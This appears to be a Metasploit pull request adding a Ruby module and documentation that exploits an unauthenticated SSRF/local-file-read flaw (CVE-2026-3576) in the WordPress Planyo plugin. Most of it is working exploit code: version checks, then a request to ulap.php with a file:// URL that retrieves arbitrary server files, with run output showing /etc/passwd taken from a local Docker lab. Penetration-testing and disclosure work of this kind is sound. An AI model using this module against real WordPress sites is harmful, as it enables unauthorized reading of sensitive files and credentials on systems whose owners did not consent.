### PR TITLE
Add WordPress Planyo plugin unauthenticated LFI module (CVE-2026-3576)

### DIFF
--- a/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
+++ b/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
@@ -101,7 +101,8 @@ The module should:
 ```
 msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > run
 [*] Running module against 127.0.0.1
-[+] Vulnerable version of plugin detected
+[+] Planyo plugin found: {:version=>"2.9"}
+[+] This version of plugin is vulnerable
 [*] File saved to: /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin
 [*] Auxiliary module execution completed
 msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > cat /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin

--- a/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
+++ b/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 
 Planyo Online Reservation System plugin of Wordpress before and including 3.0, fails to validate the scheme of the URL supplied via the ulap\_url parameter of its AJAX proxy ulap.php. This leads to a Server Side Request Forgery (SSRF) vulnerability which allows unauthenticated attackers to retrieve local files containing sensitive information and enumerate internal services.
 
@@ -13,6 +13,7 @@ Pre-requisites
 ```
 mkdir wordpress-docker
 cd wordpress-docker
+vim docker-compose.yml
 ```
 2. Create a docker-compose.yml file
 ```
@@ -56,14 +57,16 @@ sudo docker-compose up -d
 4. Download the vulnerable plugin and copy to relevant folder
 ```
 svn checkout https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
+mv 2.9 planyo-online-reservation-system
 sudo docker cp planyo-online-reservation-system wordpress:/var/www/html/wp-content/plugins/
 ``` 
 5. Complete Wordpress Installation
-- Navigate to http://localhost:8080 and complete Wordpress installation by creating an admin user.
+- Navigate to http://localhost:8080 and select English when asked for the language.
+- Enter a site title, username, password and email address.
 6. Activate the plugin
-- Log into admin dashboard at http://?
+- Log into admin dashboard at http://localhost:8080/wp-login.php by entering the username and password configured in the previous step.
 - On the left hand menu, select Plugins-\> Installed Plugins
-- Locate the planyo plugin and click on Activate
+- Locate the planyo plugin and click on Activate.
 
 ## Verification Steps
 1. Launch Metasploit
@@ -74,7 +77,7 @@ msfconsole
 ```
 use auxiliary/gather/wp_planyo_lfi_cve_2026_3576
 set RHOSTS 127.0.0.1
-set RPORT 80
+set RPORT 8080
 set TARGETURI /
 ```
 3. Run the module
@@ -82,9 +85,10 @@ set TARGETURI /
 run
 ```
 4. Observe output
+
 The module should:
-- Check if the target has installed the plugin
-- If the plugin is installed, check if the installed version is vulnerable
+- Check if the target is alive and has installed Wordpress
+- Check the plugin version and identify if it is vulnerable
 - Retrieve the file and save it locally
 
 ## Options
@@ -93,5 +97,31 @@ The module should:
 - FILEPATH(`/etc/passwd`): Path of local file to download
 
 ## Scenarios
+```
+msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > run
+[*] Running module against 127.0.0.1
+[+] Vulnerable version of plugin detected
+[*] File saved to: /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin
+[*] Auxiliary module execution completed
+msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > cat /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin
+[*] exec: cat /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin
 
- 
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+```

--- a/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
+++ b/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
@@ -1,21 +1,22 @@
 ## Vulnerable Application
 
-Planyo Online Reservation System plugin of Wordpress before and including 3.0, fails to validate the scheme of the URL supplied via the ulap\_url parameter of its AJAX proxy ulap.php. This leads to a Server Side Request Forgery (SSRF) vulnerability which allows unauthenticated attackers to retrieve local files containing sensitive information and enumerate internal services.
+Planyo Online Reservation System plugin of Wordpress prior to 3.1, fails to validate the scheme of the URL supplied to its AJAX proxy.
+This leads to a Server Side Request Forgery (SSRF) vulnerability allowing unauthenticated attackers to retrieve local sensitive files.
 
-This module uses this vulnerability to retrieve the contents of arbitrary local files by supplying a file:// URL to ulap.php.
+This module uses this vulnerability to retrieve the contents of arbitrary local files by supplying a file:// URL to AJAX proxy ulap.php.
 
-Pre-requisites
-- Docker and Docker compose installed.
+### Pre-requisites
+- **Docker** and **Docker compose** installed.
 
 ## Setup
 
-1. Create a home directory
+1. **Create a home directory**
 ```
 mkdir wordpress-docker
 cd wordpress-docker
 vim docker-compose.yml
 ```
-2. Create a docker-compose.yml file
+2. **Create a docker-compose.yml file**
 ```
 services:
   db:
@@ -50,41 +51,41 @@ volumes:
   db_data:
   wordpress_data:
 ```
-3. Start the container
+3. **Start the container**
 ```
 sudo docker-compose up -d
 ```
-4. Download the vulnerable plugin and copy to relevant folder
+4. **Download the vulnerable plugin and copy to relevant folder**
 ```
 svn checkout https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
 mv 2.9 planyo-online-reservation-system
 sudo docker cp planyo-online-reservation-system wordpress:/var/www/html/wp-content/plugins/
-``` 
-5. Complete Wordpress Installation
+```
+5. **Complete Wordpress Installation**
 - Navigate to http://localhost:8080 and select English when asked for the language.
 - Enter a site title, username, password and email address.
-6. Activate the plugin
+6. **Activate the plugin**
 - Log into admin dashboard at http://localhost:8080/wp-login.php by entering the username and password configured in the previous step.
 - On the left hand menu, select Plugins-\> Installed Plugins
 - Locate the planyo plugin and click on Activate.
 
 ## Verification Steps
-1. Launch Metasploit
+1. **Launch Metasploit**
 ```
 msfconsole
 ```
-2. Load the Planyo LFI scanner
+2. **Load the Planyo LFI scanner**
 ```
 use auxiliary/gather/wp_planyo_lfi_cve_2026_3576
 set RHOSTS 127.0.0.1
 set RPORT 8080
 set TARGETURI /
 ```
-3. Run the module
+3. **Run the module**
 ```
 run
 ```
-4. Observe output
+4. **Observe output**
 
 The module should:
 - Check if the target is alive and has installed Wordpress
@@ -93,8 +94,8 @@ The module should:
 
 ## Options
 
-- TARGETURI(`/`): Base path to Wordpress
-- FILEPATH(`/etc/passwd`): Path of local file to download
+- **TARGETURI**(`/`): Base path to Wordpress
+- **FILEPATH**(`/etc/passwd`): Path of local file to download
 
 ## Scenarios
 ```

--- a/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
+++ b/documentation/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.md
@@ -1,0 +1,97 @@
+# Vulnerable Application
+
+Planyo Online Reservation System plugin of Wordpress before and including 3.0, fails to validate the scheme of the URL supplied via the ulap\_url parameter of its AJAX proxy ulap.php. This leads to a Server Side Request Forgery (SSRF) vulnerability which allows unauthenticated attackers to retrieve local files containing sensitive information and enumerate internal services.
+
+This module uses this vulnerability to retrieve the contents of arbitrary local files by supplying a file:// URL to ulap.php.
+
+Pre-requisites
+- Docker and Docker compose installed.
+
+## Setup
+
+1. Create a home directory
+```
+mkdir wordpress-docker
+cd wordpress-docker
+```
+2. Create a docker-compose.yml file
+```
+services:
+  db:
+    image: mysql:8.0
+    container_name: wordpress-db
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: rootpassword
+      MYSQL_DATABASE: wordpress
+      MYSQL_USER: bala
+      MYSQL_PASSWORD: password
+    volumes:
+      - db_data:/var/lib/mysql
+
+  wordpress:
+    image: wordpress:latest
+    container_name: wordpress
+    restart: unless-stopped
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+    environment:
+      WORDPRESS_DB_HOST: db:3306
+      WORDPRESS_DB_USER: bala
+      WORDPRESS_DB_PASSWORD: password
+      WORDPRESS_DB_NAME: wordpress
+    volumes:
+      - wordpress_data:/var/www/html
+
+volumes:
+  db_data:
+  wordpress_data:
+```
+3. Start the container
+```
+sudo docker-compose up -d
+```
+4. Download the vulnerable plugin and copy to relevant folder
+```
+svn checkout https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
+sudo docker cp planyo-online-reservation-system wordpress:/var/www/html/wp-content/plugins/
+``` 
+5. Complete Wordpress Installation
+- Navigate to http://localhost:8080 and complete Wordpress installation by creating an admin user.
+6. Activate the plugin
+- Log into admin dashboard at http://?
+- On the left hand menu, select Plugins-\> Installed Plugins
+- Locate the planyo plugin and click on Activate
+
+## Verification Steps
+1. Launch Metasploit
+```
+msfconsole
+```
+2. Load the Planyo LFI scanner
+```
+use auxiliary/gather/wp_planyo_lfi_cve_2026_3576
+set RHOSTS 127.0.0.1
+set RPORT 80
+set TARGETURI /
+```
+3. Run the module
+```
+run
+```
+4. Observe output
+The module should:
+- Check if the target has installed the plugin
+- If the plugin is installed, check if the installed version is vulnerable
+- Retrieve the file and save it locally
+
+## Options
+
+- TARGETURI(`/`): Base path to Wordpress
+- FILEPATH(`/etc/passwd`): Path of local file to download
+
+## Scenarios
+
+ 

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RPORT(8080),
+        Opt::RPORT(80),
         OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']),
         OptString.new('TARGETURI', [true, 'Base path to the Wordpress installation', '/'])
       ]

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -1,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Planyo Online Reservation System Arbitrary File Read (CVE-2026-3576)',
+        'Description' => %q{
+          This module exploits a Server Side Request Forgery (SSRF) vulnerability in Wordpress's Planyo Online Reservation System v3.0 or less.
+          The plugin's AJAX proxy ulap.php does not require authentication and does not validate URL scheme supplied via ulap_url parameter.
+          This allows unauthenticated attackers to supply file:// URLs to ulap.php and retrieve local files from the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sinn3r', # Used sinn3r's yaws_traversal exploit module as a skeleton
+          'Balachandar Gowrisankar'
+        ],
+        'References' => [
+          ['CVE', '2026-3576'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2026-3576'],
+          ['GHSA', 'jjq9-3x6f-75pj']
+        ],
+        'DisclosureDate' => '2026-07-10',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']),
+        OptString.new('TARGETURI', [true, 'Base path to the Wordpress installation', '/'])
+      ]
+    )
+  end
+
+  # Plugin versions prior to 3.1 do not have a stable tag or version in readme.txt. So implemented a module to extract version from changelog portion of readme.txt
+  def check_plugin_version_from_changelog(fixed_version)
+    changelog_url = '/wp-content/plugins/planyo-online-reservation-system/readme.txt'
+    res = send_request_cgi(
+      'uri' => "/#{datastore['TARGETURI']}/#{changelog_url}",
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      return Msf::Exploit::CheckCode::Unknown(res ? "Response code=#{res.code}" : 'No response')
+    end
+
+    body = res.body.to_s
+    changelog = body[/==\s*Changelog\s*==(.*)/mi, 1]
+
+    versions = changelog.scan(/^\s*=\s*v?([0-9A-Za-z._-]+)\s*=\s*$/)
+
+    if Rex::Version.new(versions.last.first) <= Rex::Version.new(fixed_version)
+      return Msf::Exploit::CheckCode::Appears(details: { version: versions.last.first })
+    else
+      return Msf::Exploit::CheckCode::Safe(details: { version: versions.last.first })
+    end
+  end
+
+  def run
+    # Check if server is reachable and Wordpress is installed
+    unless wordpress_and_online?
+      print_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    # Check if filename is specified
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error('Please supply the name of the file you want to download')
+      return
+    end
+
+    # Check if plugin version is vulnerable
+    readme_code = check_plugin_version_from_readme('planyo-online-reservation-system', '3.0')
+
+    if readme_code == Msf::Exploit::CheckCode::Unknown
+      print_error('Plugin\'s version could not be found. Try overriding vulnerability check')
+      return
+    elsif readme_code == Msf::Exploit::CheckCode::Safe
+      print_good("Plugin found: #{readme_code.details}")
+      print_error('This version of plugin is not vulnerable')
+      return
+    # Check version from changelog section if stable tag or version details are not present in readme.txt
+    elsif readme_code == Msf::Exploit::CheckCode::Detected
+      changelog_code = check_plugin_version_from_changelog('3.0')
+      if changelog_code == Msf::Exploit::CheckCode::Safe
+        print_good("Plugin found: #{changelog_code.details}")
+        print_error('This version of plugin is not vulnerable')
+        return
+      end
+    end
+    print_good('Vulnerable version of plugin detected')
+
+    # Create request
+    route = 'wp-content/plugins/planyo-online-reservation-system/ulap.php?ulap_url=file://localhost'
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => "/#{datastore['TARGETURI']}/#{route}/#{datastore['FILEPATH']}"
+    }, 25)
+
+    # Show data if needed
+    if res && res.code == 200
+      vprint_line(res.to_s)
+      fname = File.basename(datastore['FILEPATH'])
+
+      path = store_loot(
+        'planyo.http',
+        'application/octet-stream',
+        datastore['RHOST'],
+        res.body,
+        fname
+      )
+      print_status("File saved to: #{path}")
+    else
+      print_error('Nothing was downloaded. Check the file path')
+    end
+  end
+end

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -59,6 +59,7 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET'
     )
 
+     return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('Changelog')
     body = res.body.to_s
     changelog = body[/==\s*Changelog\s*==(.*)/mi, 1]
     unless changelog
@@ -76,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
       return Msf::Exploit::CheckCode::Safe(details: { version: version })
     end
   rescue ArgumentError => e
-    Msf::Exploit::Checkcode::Detected(e.message)
+    Msf::Exploit::CheckCode::Detected(e.message)
   end
 
   def run
@@ -93,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # Check if plugin version is vulnerable
-    readme_code = check_plugin_version_from_readme('planyo-online-reservation-system', '3.0')
+    readme_code = check_plugin_version_from_readme('planyo-online-reservation-system', '3.1')
 
     if readme_code == Msf::Exploit::CheckCode::Unknown
       print_status('No response for plugin\'s readme.txt or it could not be found')

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     return Msf::Exploit::CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('Changelog')
-    
     body = res.body.to_s
     changelog = body[/==\s*Changelog\s*==(.*)/mi, 1]
     unless changelog

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -59,20 +59,24 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET'
     )
 
-    if res.nil? || res.code != 200
-      return Msf::Exploit::CheckCode::Unknown(res ? "Response code=#{res.code}" : 'No response')
-    end
-
     body = res.body.to_s
     changelog = body[/==\s*Changelog\s*==(.*)/mi, 1]
-
-    versions = changelog.scan(/^\s*=\s*v?([0-9A-Za-z._-]+)\s*=\s*$/)
-
-    if Rex::Version.new(versions.last.first) <= Rex::Version.new(fixed_version)
-      return Msf::Exploit::CheckCode::Appears(details: { version: versions.last.first })
-    else
-      return Msf::Exploit::CheckCode::Safe(details: { version: versions.last.first })
+    unless changelog
+      return Msf::Exploit::CheckCode::Detected('Version could not be identified from Stable Tag, Version or Changelog headers')
     end
+
+    version = changelog.scan(/^\s*=\s*v?([0-9A-Za-z._-]+)\s*=\s*$/).last&.first
+    unless version
+      return Msf::Exploit::CheckCode::Detected('Version number could not be identified from Stable Tag, Version or Changelog headers')
+    end
+
+    if Rex::Version.new(version) <= Rex::Version.new(fixed_version)
+      return Msf::Exploit::CheckCode::Appears(details: { version: version })
+    else
+      return Msf::Exploit::CheckCode::Safe(details: { version: version })
+    end
+  rescue ArgumentError => e
+    Msf::Exploit::Checkcode::Detected(e.message)
   end
 
   def run
@@ -92,22 +96,30 @@ class MetasploitModule < Msf::Auxiliary
     readme_code = check_plugin_version_from_readme('planyo-online-reservation-system', '3.0')
 
     if readme_code == Msf::Exploit::CheckCode::Unknown
-      print_error('Planyo plugin\'s version could not be found. Try overriding vulnerability check')
+      print_status('No response for plugin\'s readme.txt or it could not be found')
       return
     elsif readme_code == Msf::Exploit::CheckCode::Safe
       print_good("Planyo plugin found: #{readme_code.details}")
       print_error('This version of plugin is not vulnerable')
       return
+    elsif readme_code == Msf::Exploit::CheckCode::Appears
+      print_good("Planyo plugin found: #{readme_code.details}")
+      print_good('This version of plugin is vulnerable')
     # Check version from changelog section if stable tag or version details are not present in readme.txt
     elsif readme_code == Msf::Exploit::CheckCode::Detected
       changelog_code = check_plugin_version_from_changelog('3.0')
-      if changelog_code == Msf::Exploit::CheckCode::Safe
+      if changelog_code == Msf::Exploit::CheckCode::Detected
+        print_status(changelog_code.message)
+        return
+      elsif changelog_code == Msf::Exploit::CheckCode::Safe
         print_good("Planyo plugin found: #{changelog_code.details}")
         print_error('This version of plugin is not vulnerable')
         return
+      else
+        print_good("Planyo plugin found: #{changelog_code.details}")
+        print_good('This version of plugin is vulnerable')
       end
     end
-    print_good('Vulnerable version of Planyo plugin detected')
 
     # Create request
     route = normalize_uri(

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Auxiliary
     res = send_request_raw({
       'method' => 'GET',
       'uri' => route
-    }, 25)
+    })
 
     unless res
       fail_with(Failure::Unreachable, 'No response received while attempting LFI')

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -110,21 +110,24 @@ class MetasploitModule < Msf::Auxiliary
       'uri' => "/#{datastore['TARGETURI']}/#{route}/#{datastore['FILEPATH']}"
     }, 25)
 
-    # Show data if needed
-    if res && res.code == 200
-      vprint_line(res.to_s)
-      fname = File.basename(datastore['FILEPATH'])
-
-      path = store_loot(
-        'planyo.http',
-        'application/octet-stream',
-        datastore['RHOST'],
-        res.body,
-        fname
-      )
-      print_status("File saved to: #{path}")
-    else
-      print_error('Nothing was downloaded. Check the file path')
+    unless res
+      fail_with(Failure::Unreachable, 'No response received while attempting LFI')
     end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP status: #{res.code} while attempting LFI")
+    end
+
+    # Show data if needed
+    vprint_line(res.to_s)
+    fname = File.basename(datastore['FILEPATH'])
+
+    path = store_loot(
+      'planyo.http',
+      'application/octet-stream',
+      datastore['RHOST'],
+      res.body,
+      fname
+    )
+    print_status("File saved to: #{path}")
   end
 end

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -60,6 +60,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     return Msf::Exploit::CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('Changelog')
+
     body = res.body.to_s
     changelog = body[/==\s*Changelog\s*==(.*)/mi, 1]
     unless changelog

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -47,9 +47,15 @@ class MetasploitModule < Msf::Auxiliary
 
   # Plugin versions prior to 3.1 do not have a stable tag or version in readme.txt. So implemented a module to extract version from changelog portion of readme.txt
   def check_plugin_version_from_changelog(fixed_version)
-    changelog_url = '/wp-content/plugins/planyo-online-reservation-system/readme.txt'
+    changelog_url = normalize_uri(
+      datastore['TARGETURI'],
+      'wp-content',
+      'plugins',
+      'planyo-online-reservation-system',
+      'readme.txt'
+    )
     res = send_request_cgi(
-      'uri' => "/#{datastore['TARGETURI']}/#{changelog_url}",
+      'uri' => changelog_url,
       'method' => 'GET'
     )
 
@@ -86,28 +92,36 @@ class MetasploitModule < Msf::Auxiliary
     readme_code = check_plugin_version_from_readme('planyo-online-reservation-system', '3.0')
 
     if readme_code == Msf::Exploit::CheckCode::Unknown
-      print_error('Plugin\'s version could not be found. Try overriding vulnerability check')
+      print_error('Planyo plugin\'s version could not be found. Try overriding vulnerability check')
       return
     elsif readme_code == Msf::Exploit::CheckCode::Safe
-      print_good("Plugin found: #{readme_code.details}")
+      print_good("Planyo plugin found: #{readme_code.details}")
       print_error('This version of plugin is not vulnerable')
       return
     # Check version from changelog section if stable tag or version details are not present in readme.txt
     elsif readme_code == Msf::Exploit::CheckCode::Detected
       changelog_code = check_plugin_version_from_changelog('3.0')
       if changelog_code == Msf::Exploit::CheckCode::Safe
-        print_good("Plugin found: #{changelog_code.details}")
+        print_good("Planyo plugin found: #{changelog_code.details}")
         print_error('This version of plugin is not vulnerable')
         return
       end
     end
-    print_good('Vulnerable version of plugin detected')
+    print_good('Vulnerable version of Planyo plugin detected')
 
     # Create request
-    route = 'wp-content/plugins/planyo-online-reservation-system/ulap.php?ulap_url=file://localhost'
+    route = normalize_uri(
+      datastore['TARGETURI'],
+      'wp-content',
+      'plugins',
+      'planyo-online-reservation-system',
+      'ulap.php'
+    )
+    route += "?ulap_url=file://localhost#{datastore['FILEPATH']}"
+
     res = send_request_raw({
       'method' => 'GET',
-      'uri' => "/#{datastore['TARGETURI']}/#{route}/#{datastore['FILEPATH']}"
+      'uri' => route
     }, 25)
 
     unless res

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -25,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'References' => [
           ['CVE', '2026-3576'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2026-3576'],
           ['GHSA', 'jjq9-3x6f-75pj']
         ],
         'DisclosureDate' => '2026-07-10',

--- a/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
+++ b/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
@@ -59,7 +59,8 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET'
     )
 
-     return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('Changelog')
+    return Msf::Exploit::CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('Changelog')
+    
     body = res.body.to_s
     changelog = body[/==\s*Changelog\s*==(.*)/mi, 1]
     unless changelog


### PR DESCRIPTION
## Description

This module exploits [CVE-2026-3576](https://github.com/advisories/GHSA-jjq9-3x6f-75pj), a local file inclusion vulnerability via server side request forgery in WordPress's Planyo Online Reservation System plugin(versions < 3.1). The plugin's AJAX proxy ulap.php does not validate the scheme of URLs supplied to it. This allows unauthenticated attackers to supply file:// URLs to ulap.php and retrieve any arbitrary local file contents from the target.

## Breaking Changes

None

## Reviewer Notes

Prior to version 3.1, the readme.txt file of the plugin does not mention the version in Stable Tag or Version headers. Instead, the version can be identified by looking at the last version mentioned in the Changelog section of readme.txt. Since check_plugin_version_from_readme() supports only Version and Stable Tag headers, I have implemented a check_plugin_version_from_changelog() function to scan the changelog section of readme.txt and retrieve current version. 

## Verification Steps

1. Set up Wordpress with Planyo Online Reservation Plugin < 3.1(a `docker-compose.yml` is given in the module documentation)
2. Start `msfconsole` and type `use auxiliary/gather/wp_planyo_lfi_cve_2026_3576`
3. Set target IP, target port and target URI with `set RHOSTS`, `set RPORT` and `set TARGETURI`
4. Execute `run`. It should identify that the plugin version is vulnerable and save the contents of the arbitrary file locally

## Test Evidence

The module was tested with Wordpress 7.0.2(docker image) and Planyo Online Reservation plugin 2.9 and 3.1. For version 2.9, the module correctly identified the version as vulnerable and locally saved the contents of target's `/etc/passwd` file. For version 3.1, the module correctly identified the version as not vulnerable.

Planyo Online Reservation System plugin 2.9

```
msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > run
[*] Running module against 127.0.0.1
[+] Planyo plugin found: {:version=>"2.9"}
[+] This version of plugin is vulnerable
[*] File saved to: /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin
[*] Auxiliary module execution completed
msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > cat /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin
[*] exec: cat /home/kali/.msf4/loot/20260810080420_default_127.0.0.1_planyo.http_669878.bin

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```
Planyo Online Reservation System plugin 3.1

```
msf auxiliary(gather/wp_planyo_lfi_cve_2026_3576) > run
[*] Running module against 127.0.0.1
[+] Plugin found: {:version=>"3.1"}
[-] This version of plugin is not vulnerable
[*] Auxiliary module execution completed
```
## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux |
| **Target Software/Hardware** | Wordpress 7.0.2 |
| **Docker Image / Vagrant Setup** | Wordpress 7.0.2 + MySQL 8.0 compose file in module documentation |

## AI Usage Disclosure

ChatGPT was used to help with check_plugin_version_from_changelog() helper function. The code was manually validated and modified accordingly by the author.

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules`
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)